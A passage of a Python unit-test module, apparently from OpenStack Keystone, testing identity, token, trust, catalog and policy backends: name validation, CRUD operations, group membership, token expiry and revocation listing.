tenant['id'],
tenant)
tenant = {'id': 'fake1', 'name': 123,
'domain_id': DEFAULT_DOMAIN_ID}
self.assertRaises(exception.ValidationError,
self.identity_man.create_project, {},
tenant['id'],
tenant)
def test_update_project_blank_name_fails(self):
tenant = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_project({}, 'fake1', tenant)
tenant['name'] = ''
self.assertRaises(exception.ValidationError,
self.identity_api.update_project,
tenant['id'],
tenant)
def test_update_project_long_name_fails(self):
tenant = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_project({}, 'fake1', tenant)
tenant['name'] = 'a' * 65
self.assertRaises(exception.ValidationError,
self.identity_api.update_project,
tenant['id'],
tenant)
def test_update_project_invalid_name_fails(self):
tenant = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_project({}, 'fake1', tenant)
tenant['name'] = None
self.assertRaises(exception.ValidationError,
self.identity_api.update_project,
tenant['id'],
tenant)
tenant['name'] = 123
self.assertRaises(exception.ValidationError,
self.identity_api.update_project,
tenant['id'],
tenant)
def test_create_user_long_name_fails(self):
user = {'id': 'fake1', 'name': 'a' * 65,
'domain_id': DEFAULT_DOMAIN_ID}
self.assertRaises(exception.ValidationError,
self.identity_man.create_user, {},
'fake1',
user)
def test_create_user_blank_name_fails(self):
user = {'id': 'fake1', 'name': '',
'domain_id': DEFAULT_DOMAIN_ID}
self.assertRaises(exception.ValidationError,
self.identity_man.create_user, {},
'fake1',
user)
def test_create_user_invalid_name_fails(self):
user = {'id': 'fake1', 'name': None,
'domain_id': DEFAULT_DOMAIN_ID}
self.assertRaises(exception.ValidationError,
self.identity_man.create_user, {},
'fake1',
user)
user = {'id': 'fake1', 'name': 123,
'domain_id': DEFAULT_DOMAIN_ID}
self.assertRaises(exception.ValidationError,
self.identity_man.create_user, {},
'fake1',
user)
def test_update_user_long_name_fails(self):
user = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_user({}, 'fake1', user)
user['name'] = 'a' * 65
self.assertRaises(exception.ValidationError,
self.identity_api.update_user,
'fake1',
user)
def test_update_user_blank_name_fails(self):
user = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_user({}, 'fake1', user)
user['name'] = ''
self.assertRaises(exception.ValidationError,
self.identity_api.update_user,
'fake1',
user)
def test_update_user_invalid_name_fails(self):
user = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_user({}, 'fake1', user)
user['name'] = None
self.assertRaises(exception.ValidationError,
self.identity_api.update_user,
'fake1',
user)
user['name'] = 123
self.assertRaises(exception.ValidationError,
self.identity_api.update_user,
'fake1',
user)
def test_list_users(self):
users = self.identity_api.list_users()
        for test_user in default_fixtures.USERS:
            # A bare generator expression is always truthy, so the original
            # assertion could never fail; check membership explicitly.
            self.assertTrue(any(x['id'] == test_user['id'] for x in users))
def test_list_groups(self):
group1 = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
group2 = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, group1['id'], group1)
self.identity_man.create_group({}, group2['id'], group2)
groups = self.identity_api.list_groups()
self.assertEquals(len(groups), 2)
group_ids = []
for group in groups:
group_ids.append(group.get('id'))
self.assertIn(group1['id'], group_ids)
self.assertIn(group2['id'], group_ids)
def test_list_domains(self):
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
self.identity_api.create_domain(domain2['id'], domain2)
domains = self.identity_api.list_domains()
self.assertEquals(len(domains), 3)
domain_ids = []
for domain in domains:
domain_ids.append(domain.get('id'))
self.assertIn(DEFAULT_DOMAIN_ID, domain_ids)
self.assertIn(domain1['id'], domain_ids)
self.assertIn(domain2['id'], domain_ids)
def test_list_projects(self):
projects = self.identity_api.list_projects()
self.assertEquals(len(projects), 3)
project_ids = []
for project in projects:
project_ids.append(project.get('id'))
self.assertIn(self.tenant_bar['id'], project_ids)
self.assertIn(self.tenant_baz['id'], project_ids)
def test_list_roles(self):
roles = self.identity_api.list_roles()
        for test_role in default_fixtures.ROLES:
            # A bare generator expression is always truthy, so the original
            # assertion could never fail; check membership explicitly.
            self.assertTrue(any(x['id'] == test_role['id'] for x in roles))
def test_delete_project_with_role_assignments(self):
tenant = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_api.create_project(tenant['id'], tenant)
self.identity_api.add_role_to_user_and_project(
self.user_foo['id'], tenant['id'], 'member')
self.identity_api.delete_project(tenant['id'])
self.assertRaises(exception.NotFound,
self.identity_api.get_project,
tenant['id'])
def test_delete_role_check_role_grant(self):
role = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
alt_role = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role['id'], role)
self.identity_api.create_role(alt_role['id'], alt_role)
self.identity_api.add_role_to_user_and_project(
self.user_foo['id'], self.tenant_bar['id'], role['id'])
self.identity_api.add_role_to_user_and_project(
self.user_foo['id'], self.tenant_bar['id'], alt_role['id'])
self.identity_api.delete_role(role['id'])
roles_ref = self.identity_api.get_roles_for_user_and_project(
self.user_foo['id'], self.tenant_bar['id'])
self.assertNotIn(role['id'], roles_ref)
self.assertIn(alt_role['id'], roles_ref)
def test_create_project_doesnt_modify_passed_in_dict(self):
new_project = {'id': 'tenant_id', 'name': uuid.uuid4().hex,
'domain_id': DEFAULT_DOMAIN_ID}
original_project = new_project.copy()
self.identity_man.create_project({}, 'tenant_id', new_project)
self.assertDictEqual(original_project, new_project)
def test_create_user_doesnt_modify_passed_in_dict(self):
new_user = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex,
'domain_id': DEFAULT_DOMAIN_ID}
original_user = new_user.copy()
self.identity_man.create_user({}, 'user_id', new_user)
self.assertDictEqual(original_user, new_user)
def test_update_user_enable(self):
user = {'id': 'fake1', 'name': 'fake1', 'enabled': True,
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_api.create_user('fake1', user)
user_ref = self.identity_api.get_user('fake1')
self.assertEqual(user_ref['enabled'], True)
user['enabled'] = False
self.identity_api.update_user('fake1', user)
user_ref = self.identity_api.get_user('fake1')
self.assertEqual(user_ref['enabled'], user['enabled'])
user['enabled'] = True
self.identity_api.update_user('fake1', user)
user_ref = self.identity_api.get_user('fake1')
self.assertEqual(user_ref['enabled'], user['enabled'])
def test_update_project_enable(self):
tenant = {'id': 'fake1', 'name': 'fake1', 'enabled': True,
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_api.create_project('fake1', tenant)
tenant_ref = self.identity_api.get_project('fake1')
self.assertEqual(tenant_ref['enabled'], True)
tenant['enabled'] = False
self.identity_api.update_project('fake1', tenant)
tenant_ref = self.identity_api.get_project('fake1')
self.assertEqual(tenant_ref['enabled'], tenant['enabled'])
tenant['enabled'] = True
self.identity_api.update_project('fake1', tenant)
tenant_ref = self.identity_api.get_project('fake1')
self.assertEqual(tenant_ref['enabled'], tenant['enabled'])
def test_add_user_to_group(self):
domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain['id'], domain)
new_group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
self.identity_api.add_user_to_group(new_user['id'],
new_group['id'])
groups = self.identity_api.list_groups_for_user(new_user['id'])
self.assertIn(new_group['id'], [x['id'] for x in groups])
def test_add_user_to_group_404(self):
domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain['id'], domain)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
self.assertRaises(exception.GroupNotFound,
self.identity_api.add_user_to_group,
new_user['id'],
uuid.uuid4().hex)
new_group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
self.assertRaises(exception.UserNotFound,
self.identity_api.add_user_to_group,
uuid.uuid4().hex,
new_group['id'])
def test_check_user_in_group(self):
domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain['id'], domain)
new_group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
self.identity_api.add_user_to_group(new_user['id'],
new_group['id'])
self.identity_api.check_user_in_group(new_user['id'], new_group['id'])
def test_check_user_not_in_group(self):
new_group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
self.assertRaises(exception.UserNotFound,
self.identity_api.check_user_in_group,
uuid.uuid4().hex,
new_group['id'])
def test_list_users_in_group(self):
domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain['id'], domain)
new_group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
self.identity_api.add_user_to_group(new_user['id'],
new_group['id'])
user_refs = self.identity_api.list_users_in_group(new_group['id'])
self.assertIn(new_user['id'], [x['id'] for x in user_refs])
def test_remove_user_from_group(self):
domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain['id'], domain)
new_group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
self.identity_api.add_user_to_group(new_user['id'],
new_group['id'])
groups = self.identity_api.list_groups_for_user(new_user['id'])
self.assertIn(new_group['id'], [x['id'] for x in groups])
self.identity_api.remove_user_from_group(new_user['id'],
new_group['id'])
groups = self.identity_api.list_groups_for_user(new_user['id'])
self.assertNotIn(new_group['id'], [x['id'] for x in groups])
def test_remove_user_from_group_404(self):
domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain['id'], domain)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
new_group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
self.assertRaises(exception.NotFound,
self.identity_api.remove_user_from_group,
new_user['id'],
uuid.uuid4().hex)
self.assertRaises(exception.NotFound,
self.identity_api.remove_user_from_group,
uuid.uuid4().hex,
new_group['id'])
self.assertRaises(exception.NotFound,
self.identity_api.remove_user_from_group,
uuid.uuid4().hex,
uuid.uuid4().hex)
def test_group_crud(self):
group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, group['id'], group)
group_ref = self.identity_api.get_group(group['id'])
self.assertDictContainsSubset(group_ref, group)
group['name'] = uuid.uuid4().hex
self.identity_api.update_group(group['id'], group)
group_ref = self.identity_api.get_group(group['id'])
self.assertDictContainsSubset(group_ref, group)
self.identity_api.delete_group(group['id'])
self.assertRaises(exception.GroupNotFound,
self.identity_api.get_group,
group['id'])
def test_create_duplicate_group_name_fails(self):
group1 = {'id': uuid.uuid4().hex, 'domain_id': DEFAULT_DOMAIN_ID,
'name': uuid.uuid4().hex}
group2 = {'id': uuid.uuid4().hex, 'domain_id': DEFAULT_DOMAIN_ID,
'name': group1['name']}
self.identity_man.create_group({}, group1['id'], group1)
self.assertRaises(exception.Conflict,
self.identity_man.create_group, {},
group2['id'], group2)
def test_create_duplicate_group_name_in_different_domains(self):
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
group1 = {'id': uuid.uuid4().hex, 'domain_id': DEFAULT_DOMAIN_ID,
'name': uuid.uuid4().hex}
group2 = {'id': uuid.uuid4().hex, 'domain_id': new_domain['id'],
'name': group1['name']}
self.identity_man.create_group({}, group1['id'], group1)
self.identity_man.create_group({}, group2['id'], group2)
def test_move_group_between_domains(self):
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
group = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': domain1['id']}
self.identity_man.create_group({}, group['id'], group)
group['domain_id'] = domain2['id']
self.identity_api.update_group(group['id'], group)
def test_move_group_between_domains_with_clashing_names_fails(self):
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
# First, create a group in domain1
group1 = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': domain1['id']}
self.identity_man.create_group({}, group1['id'], group1)
# Now create a group in domain2 with a potentially clashing
# name - which should work since we have domain separation
group2 = {'id': uuid.uuid4().hex,
'name': group1['name'],
'domain_id': domain2['id']}
self.identity_man.create_group({}, group2['id'], group2)
# Now try and move group1 into the 2nd domain - which should
# fail since the names clash
group1['domain_id'] = domain2['id']
self.assertRaises(exception.Conflict,
self.identity_api.update_group,
group1['id'],
group1)
def test_project_crud(self):
project = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': uuid.uuid4().hex}
self.identity_man.create_project({}, project['id'], project)
project_ref = self.identity_api.get_project(project['id'])
self.assertDictContainsSubset(project_ref, project)
project['name'] = uuid.uuid4().hex
self.identity_api.update_project(project['id'], project)
project_ref = self.identity_api.get_project(project['id'])
self.assertDictContainsSubset(project_ref, project)
self.identity_api.delete_project(project['id'])
self.assertRaises(exception.ProjectNotFound,
self.identity_api.get_project,
project['id'])
def test_domain_crud(self):
domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'enabled': True}
self.identity_api.create_domain(domain['id'], domain)
domain_ref = self.identity_api.get_domain(domain['id'])
self.assertDictEqual(domain_ref, domain)
domain['name'] = uuid.uuid4().hex
self.identity_api.update_domain(domain['id'], domain)
domain_ref = self.identity_api.get_domain(domain['id'])
self.assertDictEqual(domain_ref, domain)
self.identity_api.delete_domain(domain['id'])
self.assertRaises(exception.DomainNotFound,
self.identity_api.get_domain,
domain['id'])
def test_user_crud(self):
user = {'domain_id': uuid.uuid4().hex, 'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex, 'password': 'passw0rd'}
self.identity_api.create_user(user['id'], user)
user_ref = self.identity_api.get_user(user['id'])
del user['password']
user_ref_dict = dict((x, user_ref[x]) for x in user_ref)
self.assertDictContainsSubset(user_ref_dict, user)
user['password'] = uuid.uuid4().hex
self.identity_api.update_user(user['id'], user)
user_ref = self.identity_api.get_user(user['id'])
del user['password']
user_ref_dict = dict((x, user_ref[x]) for x in user_ref)
self.assertDictContainsSubset(user_ref_dict, user)
self.identity_api.delete_user(user['id'])
self.assertRaises(exception.UserNotFound,
self.identity_api.get_user,
user['id'])
def test_list_user_projects(self):
user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'enabled': True}
self.identity_man.create_user({}, user1['id'], user1)
user_projects = self.identity_api.list_user_projects(user1['id'])
self.assertEquals(len(user_projects), 0)
self.identity_api.create_grant(user_id=user1['id'],
project_id=self.tenant_bar['id'],
role_id=self.role_member['id'])
self.identity_api.create_grant(user_id=user1['id'],
project_id=self.tenant_baz['id'],
role_id=self.role_member['id'])
user_projects = self.identity_api.list_user_projects(user1['id'])
self.assertEquals(len(user_projects), 2)
class TokenTests(object):
def test_token_crud(self):
token_id = uuid.uuid4().hex
data = {'id': token_id, 'a': 'b',
'trust_id': None,
'user': {'id': 'testuserid'}}
data_ref = self.token_api.create_token(token_id, data)
expires = data_ref.pop('expires')
data_ref.pop('user_id')
self.assertTrue(isinstance(expires, datetime.datetime))
self.assertDictEqual(data_ref, data)
new_data_ref = self.token_api.get_token(token_id)
expires = new_data_ref.pop('expires')
new_data_ref.pop('user_id')
self.assertTrue(isinstance(expires, datetime.datetime))
self.assertEquals(new_data_ref, data)
self.token_api.delete_token(token_id)
self.assertRaises(exception.TokenNotFound,
self.token_api.get_token, token_id)
self.assertRaises(exception.TokenNotFound,
self.token_api.delete_token, token_id)
def create_token_sample_data(self, tenant_id=None, trust_id=None):
token_id = uuid.uuid4().hex
data = {'id': token_id, 'a': 'b',
'user': {'id': 'testuserid'}}
if tenant_id is not None:
data['tenant'] = {'id': tenant_id, 'name': tenant_id}
if trust_id is not None:
data['trust_id'] = trust_id
self.token_api.create_token(token_id, data)
return token_id
def test_token_list(self):
tokens = self.token_api.list_tokens('testuserid')
self.assertEquals(len(tokens), 0)
token_id1 = self.create_token_sample_data()
tokens = self.token_api.list_tokens('testuserid')
self.assertEquals(len(tokens), 1)
self.assertIn(token_id1, tokens)
token_id2 = self.create_token_sample_data()
tokens = self.token_api.list_tokens('testuserid')
self.assertEquals(len(tokens), 2)
self.assertIn(token_id2, tokens)
self.assertIn(token_id1, tokens)
self.token_api.delete_token(token_id1)
tokens = self.token_api.list_tokens('testuserid')
self.assertIn(token_id2, tokens)
self.assertNotIn(token_id1, tokens)
self.token_api.delete_token(token_id2)
tokens = self.token_api.list_tokens('testuserid')
self.assertNotIn(token_id2, tokens)
self.assertNotIn(token_id1, tokens)
# tenant-specific tokens
tenant1 = uuid.uuid4().hex
tenant2 = uuid.uuid4().hex
token_id3 = self.create_token_sample_data(tenant_id=tenant1)
token_id4 = self.create_token_sample_data(tenant_id=tenant2)
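# token_id1 and token_id2 were already deleted above, so only the two
# tenant-scoped tokens should remain for this user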
tokens = self.token_api.list_tokens('testuserid')
self.assertEquals(len(tokens), 2)
self.assertNotIn(token_id1, tokens)
self.assertNotIn(token_id2, tokens)
self.assertIn(token_id3, tokens)
self.assertIn(token_id4, tokens)
tokens = self.token_api.list_tokens('testuserid', tenant2)
self.assertEquals(len(tokens), 1)
self.assertNotIn(token_id1, tokens)
self.assertNotIn(token_id2, tokens)
self.assertNotIn(token_id3, tokens)
self.assertIn(token_id4, tokens)
def test_token_list_trust(self):
trust_id = uuid.uuid4().hex
token_id5 = self.create_token_sample_data(trust_id=trust_id)
tokens = self.token_api.list_tokens('testuserid', trust_id=trust_id)
self.assertEquals(len(tokens), 1)
self.assertIn(token_id5, tokens)
def test_get_token_404(self):
self.assertRaises(exception.TokenNotFound,
self.token_api.get_token,
uuid.uuid4().hex)
self.assertRaises(exception.TokenNotFound,
self.token_api.get_token,
None)
def test_delete_token_404(self):
self.assertRaises(exception.TokenNotFound,
self.token_api.delete_token,
uuid.uuid4().hex)
def test_expired_token(self):
token_id = uuid.uuid4().hex
expire_time = timeutils.utcnow() - datetime.timedelta(minutes=1)
data = {'id_hash': token_id, 'id': token_id, 'a': 'b',
'expires': expire_time,
'trust_id': None,
'user': {'id': 'testuserid'}}
data_ref = self.token_api.create_token(token_id, data)
data_ref.pop('user_id')
self.assertDictEqual(data_ref, data)
self.assertRaises(exception.TokenNotFound,
self.token_api.get_token, token_id)
def test_null_expires_token(self):
token_id = uuid.uuid4().hex
data = {'id': token_id, 'id_hash': token_id, 'a': 'b', 'expires': None,
'user': {'id': 'testuserid'}}
data_ref = self.token_api.create_token(token_id, data)
self.assertIsNotNone(data_ref['expires'])
new_data_ref = self.token_api.get_token(token_id)
self.assertEqual(data_ref, new_data_ref)
def check_list_revoked_tokens(self, token_ids):
revoked_ids = [x['id'] for x in self.token_api.list_revoked_tokens()]
for token_id in token_ids:
self.assertIn(token_id, revoked_ids)
def delete_token(self):
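# Helper (deliberately not named test_*): creates a token, deletes it,
# verifies it can no longer be fetched or re-deleted, and returns its id
# so the revocation-list tests below can assert it appears in
# list_revoked_tokens().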
token_id = uuid.uuid4().hex
data = {'id_hash': token_id, 'id': token_id, 'a': 'b',
'user': {'id': 'testuserid'}}
data_ref = self.token_api.create_token(token_id, data)
self.token_api.delete_token(token_id)
self.assertRaises(
exception.TokenNotFound,
self.token_api.get_token,
data_ref['id'])
self.assertRaises(
exception.TokenNotFound,
self.token_api.delete_token,
data_ref['id'])
return token_id
def test_list_revoked_tokens_returns_empty_list(self):
revoked_ids = [x['id'] for x in self.token_api.list_revoked_tokens()]
self.assertEqual(revoked_ids, [])
def test_list_revoked_tokens_for_single_token(self):
self.check_list_revoked_tokens([self.delete_token()])
def test_list_revoked_tokens_for_multiple_tokens(self):
self.check_list_revoked_tokens([self.delete_token()
for x in xrange(2)])
class TrustTests(object):
def create_sample_trust(self, new_id):
self.trustor = self.user_foo
self.trustee = self.user_two
trust_data = self.trust_api.create_trust(
new_id,
{'trustor_user_id': self.trustor['id'],
'trustee_user_id': self.user_two['id'],
'project_id': self.tenant_bar['id'],
'expires_at': timeutils.parse_isotime('2031-02-18T18:10:00Z'),
'impersonation': True},
roles=[{"id": "member"},
{"id": "other"},
{"id": "browser"}])
return trust_data
def test_delete_trust(self):
new_id = uuid.uuid4().hex
trust_data = self.create_sample_trust(new_id)
trust_id = trust_data['id']
self.assertIsNotNone(trust_data)
trust_data = self.trust_api.get_trust(trust_id)
self.assertEquals(new_id, trust_data['id'])
self.trust_api.delete_trust(trust_id)
self.assertIsNone(self.trust_api.get_trust(trust_id))
def test_get_trust(self):
new_id = uuid.uuid4().hex
trust_data = self.create_sample_trust(new_id)
trust_id = trust_data['id']
self.assertIsNotNone(trust_data)
trust_data = self.trust_api.get_trust(trust_id)
self.assertEquals(new_id, trust_data['id'])
def test_create_trust(self):
new_id = uuid.uuid4().hex
trust_data = self.create_sample_trust(new_id)
self.assertEquals(new_id, trust_data['id'])
self.assertEquals(self.trustee['id'], trust_data['trustee_user_id'])
self.assertEquals(self.trustor['id'], trust_data['trustor_user_id'])
self.assertTrue(timeutils.normalize_time(trust_data['expires_at']) >
timeutils.utcnow())
self.assertEquals([{'id': 'member'},
{'id': 'other'},
{'id': 'browser'}], trust_data['roles'])
def test_list_trust_by_trustee(self):
for i in range(0, 3):
trust_data = self.create_sample_trust(uuid.uuid4().hex)
trusts = self.trust_api.list_trusts_for_trustee(self.trustee)
self.assertEqual(len(trusts), 3)
self.assertEqual(trusts[0]["trustee_user_id"], self.trustee['id'])
trusts = self.trust_api.list_trusts_for_trustee(self.trustor)
self.assertEqual(len(trusts), 0)
def test_list_trust_by_trustor(self):
for i in range(0, 3):
trust_data = self.create_sample_trust(uuid.uuid4().hex)
trusts = self.trust_api.list_trusts_for_trustor(self.trustor['id'])
self.assertEqual(len(trusts), 3)
self.assertEqual(trusts[0]["trustor_user_id"], self.trustor['id'])
trusts = self.trust_api.list_trusts_for_trustor(self.trustee['id'])
self.assertEqual(len(trusts), 0)
def test_list_trusts(self):
for i in range(0, 3):
trust_data = self.create_sample_trust(uuid.uuid4().hex)
trusts = self.trust_api.list_trusts()
self.assertEqual(len(trusts), 3)
class CommonHelperTests(test.TestCase):
def test_format_helper_raises_malformed_on_missing_key(self):
with self.assertRaises(exception.MalformedEndpoint):
core.format_url("http://%(foo)s/%(bar)s", {"foo": "1"})
def test_format_helper_raises_malformed_on_wrong_type(self):
with self.assertRaises(exception.MalformedEndpoint):
core.format_url("http://%foo%s", {"foo": "1"})
def test_format_helper_raises_malformed_on_incomplete_format(self):
with self.assertRaises(exception.MalformedEndpoint):
core.format_url("http://%(foo)", {"foo": "1"})
class CatalogTests(object):
def test_service_crud(self):
# create
service_id = uuid.uuid4().hex
new_service = {
'id': service_id,
'type': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
}
res = self.catalog_api.create_service(
service_id,
new_service.copy())
self.assertDictEqual(res, new_service)
# list
services = self.catalog_api.list_services()
self.assertIn(service_id, [x['id'] for x in services])
# delete
self.catalog_api.delete_service(service_id)
self.assertRaises(exception.ServiceNotFound,
self.catalog_man.delete_service, {}, service_id)
self.assertRaises(exception.ServiceNotFound,
self.catalog_man.get_service, {}, service_id)
def test_delete_service_with_endpoint(self):
# create a service
service = {
'id': uuid.uuid4().hex,
'type': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
}
self.catalog_api.create_service(service['id'], service)
# create an endpoint attached to the service
endpoint = {
'id': uuid.uuid4().hex,
'region': uuid.uuid4().hex,
'interface': uuid.uuid4().hex[:8],
'url': uuid.uuid4().hex,
'service_id': service['id'],
}
self.catalog_api.create_endpoint(endpoint['id'], endpoint)
# deleting the service should also delete the endpoint
self.catalog_api.delete_service(service['id'])
self.assertRaises(exception.EndpointNotFound,
self.catalog_man.get_endpoint, {}, endpoint['id'])
self.assertRaises(exception.EndpointNotFound,
self.catalog_man.delete_endpoint, {}, endpoint['id'])
def test_get_service_404(self):
self.assertRaises(exception.ServiceNotFound,
self.catalog_man.get_service,
{},
uuid.uuid4().hex)
def test_delete_service_404(self):
self.assertRaises(exception.ServiceNotFound,
self.catalog_man.delete_service,
{},
uuid.uuid4().hex)
def test_create_endpoint_404(self):
endpoint = {
'id': uuid.uuid4().hex,
'service_id': uuid.uuid4().hex,
}
self.assertRaises(exception.ServiceNotFound,
self.catalog_man.create_endpoint,
{},
endpoint['id'],
endpoint)
def test_get_endpoint_404(self):
self.assertRaises(exception.EndpointNotFound,
self.catalog_man.get_endpoint,
{},
uuid.uuid4().hex)
def test_delete_endpoint_404(self):
self.assertRaises(exception.EndpointNotFound,
self.catalog_man.delete_endpoint,
{},
uuid.uuid4().hex)
def test_create_endpoint(self):
service = {
'id': uuid.uuid4().hex,
'type': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
}
self.catalog_api.create_service(service['id'], service.copy())
endpoint = {
'id': uuid.uuid4().hex,
'region': "0" * 255,
'service_id': service['id'],
'interface': 'public',
'url': uuid.uuid4().hex,
}
self.catalog_api.create_endpoint(endpoint['id'], endpoint.copy())
class PolicyTests(object):
def _new_policy_ref(self):
return {
'id': uuid.uuid4().hex,
'policy': uuid.uuid4().hex,
'type': uuid.uuid4().hex,
'endpoint_id': uuid.uuid4().hex,
}
def assertEqualPolicies(self, a, b):
self.assertEqual(a['id'], b['id'])
self.assertEqual(a['endpoint_id'], b['endpoint_id'])
self.assertEqual(a['policy'], b['policy'])
self.assertEqual(a['type'], b['type'])
def test_create(self):
ref = self._new_policy_ref()
res = self.policy_api.create_policy(ref['id'], ref)
self.assertEqualPolicies(ref, res)
def test_get(self):
ref = self._new_policy_ref()
res = self.policy_api.create_policy(ref['id'], ref)
res = self.policy_api.get_policy(ref['id'])
self.assertEqualPolicies(ref, res)
def test_list(self):
ref = self._new_policy_ref()
self.policy_api.create_policy(ref['id'], ref)
res = self.policy_api.list_policies()
res = [x for x in res if x['id'] == ref['id']][0]
self.assertEqualPolicies(ref, res)
def test_update(self):
ref = self._new_policy_ref()
self.policy_api.create_policy(ref['id'], ref)
orig = ref
ref = self._new_policy_ref()
# (cannot change policy ID)
self.assertRaises(exception.ValidationError,
self.policy_man.update_policy,
{},
orig['id'],
ref)
ref['id'] = orig['id']
res = self.policy_api.update_policy(orig['id'], ref)
self.assertEqualPolicies(ref, res)
def test_delete(self):
ref = self._new_policy_ref()
self.policy_api.create_policy(ref['id'], ref)
self.policy_api.delete_policy(ref['id'])
self.assertRaises(exception.PolicyNotFound,
self.policy_man.delete_policy, {}, ref['id'])
self.assertRaises(exception.PolicyNotFound,
self.policy_man.get_policy, {}, ref['id'])
res = self.policy_api.list_policies()
self.assertFalse(len([x for x in res if x['id'] == ref['id']]))
def test_get_policy_404(self):
self.assertRaises(exception.PolicyNotFound,
self.policy_man.get_policy,
{},
uuid.uuid4().hex)
def test_update_policy_404(self):
self.assertRaises(exception.PolicyNotFound,
self.policy_man.update_policy,
{},
uuid.uuid4().hex,
{})
def test_delete_policy_404(self):
self.assertRaises(exception.PolicyNotFound,
self.policy_man.delete_policy,
{},
uuid.uuid4().hex)
